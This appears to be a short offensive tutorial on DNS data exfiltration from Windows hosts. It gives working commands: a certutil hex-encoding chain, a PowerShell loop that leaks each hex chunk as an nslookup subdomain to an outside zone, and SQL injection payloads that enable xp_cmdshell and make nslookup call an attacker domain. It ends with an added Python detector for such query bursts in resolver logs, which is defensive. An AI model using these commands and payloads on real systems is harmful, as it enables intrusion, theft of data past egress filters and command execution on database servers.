PowerShell — Data Exfiltration over DNS (OOB)

Egress filtering is the practice of monitoring and potentially restricting the flow of information outbound from one network to another.

DNS Exfiltration

cmd /v /c ipconfig > C:\Windows\Temp\output70 && certutil -encodehex -f C:\Windows\Temp\output70 C:\Windows\Temp\output70.hex 4 && powershell.exe -exec bypass -enc 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

cmd /v /c "ipconfig > C:\Windows\Temp\outab && certutil -encodehex -f C:\Windows\Temp\outab C:\Windows\Temp\outab.hex 4"

Output in hex format.

This will be the hex value; you can decode it with CyberChef (https://gchq.github.io/CyberChef) using the "From Hex" operation.

powershell.exe -exec bypass -enc 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

$text=Get-Content C:\Windows\Temp\output70.hex;$subdomain=$text.replace(" ","");$j=11111;foreach($i in $subdomain){ $final=$j.tostring()+"."+$i+".file.dnspen.redacted.com";$j += 1; Start-Process -NoNewWindow nslookup $final }

Encoding the PowerShell command (hex-encoded)

';exec sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; --

';exec master..xp_cmdshell 'cmd.exe /c nslookup tester.dnspenX.attacker.com'; --
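Both the PowerShell loop and the xp_cmdshell/nslookup payload leave the same observable on the resolver: a burst of queries whose leading labels carry a counter and a long hex-encoded chunk, all under one external zone. The following is an added detection example, not code from the original post; it assumes a resolver log in a "<time> <client> query: <fqdn>" format and uses constructed sample lines and example domains.

```python
import re
from collections import defaultdict

# Constructed sample log lines (assumed format). The first four mimic the
# counter.<hex>.file.<zone> shape from the post; the remaining three are benign.
SAMPLE_LOG = """\
2024-01-01T10:00:01 10.0.0.5 query: 11111.57696e646f777320495020436f6e6669.file.dnspen.example.com
2024-01-01T10:00:01 10.0.0.5 query: 11112.6775726174696f6e0d0a0d0a0d0a0d0a.file.dnspen.example.com
2024-01-01T10:00:02 10.0.0.5 query: 11113.45746865726665742061646170746572.file.dnspen.example.com
2024-01-01T10:00:02 10.0.0.5 query: 11114.7220457468657265696e6574203a0d0a.file.dnspen.example.com
2024-01-01T10:00:03 10.0.0.7 query: www.example.com
2024-01-01T10:00:03 10.0.0.7 query: mail.example.com
2024-01-01T10:00:04 10.0.0.9 query: a1b2c3d4.cdn.example.net
"""

HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$", re.I)  # pure-hex label long enough to carry data
COUNTER_LABEL = re.compile(r"^\d{4,}$")            # the sequence number the loop prepends
QUERY_RE = re.compile(r"query:\s+(\S+)")

def parse_queries(log_text):
    """Yield (client, fqdn) for every log line that records a query."""
    for line in log_text.splitlines():
        parts = line.split()
        m = QUERY_RE.search(line)
        if m and len(parts) >= 2:
            yield parts[1], m.group(1).rstrip(".")

def label_features(fqdn):
    """Return (has_counter, hex_chars): is the first label a counter, and how many hex chars follow it."""
    labels = fqdn.split(".")
    has_counter = bool(COUNTER_LABEL.match(labels[0]))
    hex_chars = sum(len(lab) for lab in labels[1:] if HEX_LABEL.match(lab))
    return has_counter, hex_chars

def detect_hex_exfil(log_text, min_queries=3):
    """Flag (client, zone) pairs showing a burst of counter-prefixed, hex-carrying queries."""
    groups = defaultdict(lambda: {"queries": 0, "bytes": 0, "counters": 0})
    for client, fqdn in parse_queries(log_text):
        has_counter, hex_chars = label_features(fqdn)
        if hex_chars == 0:
            continue
        zone = ".".join(fqdn.split(".")[-3:])  # crude zone key: last three labels
        g = groups[(client, zone)]
        g["queries"] += 1
        g["bytes"] += hex_chars // 2  # two hex chars encode one exfiltrated byte
        g["counters"] += int(has_counter)
    return {k: v for k, v in groups.items()
            if v["queries"] >= min_queries and v["counters"] == v["queries"]}
```

The "bytes" figure gives an estimate of how much data left through the resolver, which is what an incident responder needs when sizing the loss.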
